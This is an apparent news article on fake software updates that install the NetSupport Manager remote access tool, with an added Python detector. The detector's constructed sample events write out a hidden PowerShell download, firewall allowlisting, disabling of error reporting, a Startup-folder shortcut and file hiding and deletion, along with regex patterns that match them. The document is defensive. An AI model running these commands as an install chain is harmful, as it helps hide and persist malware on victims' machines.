Cyber-criminals used compromised websites to distribute malware under the guise of updates to popular applications, including Adobe Flash, Chrome and Firefox. Information security training researchers found that in several cases, the fake updates delivered NetSupport Manager, a legitimate remote access tool (RAT).
NetSupport Manager is a legitimate, commercially available tool used by administrators to remotely access users’ computers. But hackers have taken advantage of this tool by installing it on victims’ computers.
This function collects various system information, such as architecture, computer name, user name, processor, OS, domain, manufacturer, model, BIOS version, security solutions, MAC address, keyboard, display controller configuration, and process list. In response, the server sends a function called step3 and a file called Update.js, which in turn loads and executes the final malicious payload.
The malware also uses PowerShell commands to download files from the server, including a standalone 7zip executable file that contains a remote access tool, and a batch script for installing the NetSupport client on the system.
The script can also disable Windows error reporting and application compatibility, add the executable file to the list of allowed programs, download a shortcut to the Startup folder, hide specific files, and delete artifacts.
By using NetSupport Manager, attackers can gain remote access to hacked systems, launch applications, receive location data, and steal system information.
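As an added defender-side example (not code from the article or from any vendor named in it), the following Python scans constructed Sysmon-style process-creation records for the installation stages described above and flags a host only when several of them appear together; the event fields, rule names, sample command lines and the three-stage threshold are all assumptions.

```python
import re
from collections import defaultdict

# Constructed, Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe",
     "cmd": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/7za.exe','C:\\Users\\u\\AppData\\Roaming\\7za.exe')"},
    {"host": "ws01", "image": "7za.exe",
     "cmd": "7za.exe x C:\\Users\\u\\AppData\\Roaming\\client.7z -oC:\\Users\\u\\AppData\\Roaming\\ns"},
    {"host": "ws01", "image": "reg.exe",
     "cmd": "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\" /v Disabled /t REG_DWORD /d 1 /f"},
    {"host": "ws01", "image": "netsh.exe",
     "cmd": "netsh firewall add allowedprogram C:\\Users\\u\\AppData\\Roaming\\ns\\client.exe ns ENABLE"},
    {"host": "ws01", "image": "cmd.exe",
     "cmd": "cmd /c copy ns.lnk \"C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ns.lnk\""},
    {"host": "ws01", "image": "cmd.exe",
     "cmd": "cmd /c attrib +h C:\\Users\\u\\AppData\\Roaming\\ns & del /f /q C:\\Users\\u\\AppData\\Roaming\\client.7z"},
    # A lone download on another host: a benign-looking update, not the chain.
    {"host": "ws02", "image": "powershell.exe",
     "cmd": "powershell -c Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile patch.msi"},
]

# One rule per stage the article describes; each matches on the command line.
RULES = {
    "powershell_download": re.compile(r"powershell.*(DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient)", re.I),
    "7zip_extract": re.compile(r"\b7za?\.exe\b\s+[xe]\b", re.I),
    "error_reporting_disabled": re.compile(r"Windows Error Reporting.*/v\s+Disabled.*/d\s+1", re.I),
    "firewall_allow": re.compile(r"netsh\s+(firewall\s+add\s+allowedprogram|advfirewall\s+firewall\s+add\s+rule)", re.I),
    "startup_shortcut": re.compile(r'\\Start Menu\\Programs\\Startup\\[^"\s]*\.lnk', re.I),
    "hide_or_delete": re.compile(r"\b(attrib\s+\+h|del\s+/[fq])", re.I),
}

def classify_event(event):
    """Return the sorted names of every rule the event's command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(event["cmd"]))

def detect_chain(events, min_stages=3):
    """Group rule hits per host and return only hosts showing at least
    min_stages distinct stages of the fake-update -> RAT install chain.
    A single hit (e.g. one PowerShell download) is too common to alert on."""
    stages = defaultdict(set)
    for ev in events:
        stages[ev["host"]].update(classify_event(ev))
    return {host: sorted(s) for host, s in stages.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, hits in detect_chain(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(hits)}")
```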
“RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well,” said Sudhanshu Dubey, information security training researcher at FireEye.
“We recently spoke about the UDPoS malware, a family which is consistently disguised as a software update to important system and administration software. Overall, the technique is probably about halfway up the clever spectrum: it’s been around for quite some time and it couldn’t be described as particularly innovative in modern times, but end-users are very used to seeing and accepting prompts for software updates to the point where many experience ‘update request fatigue’. Malicious actors don’t need to innovate or change lure techniques when their existing tricks continue to be effective,” he said.
Barry Shteiman, director of Threat Research at Exabeam, said that organisations need to be able to detect unusual activity from valid machines and users, which is why behavioural analytics has grown so quickly over the last couple of years.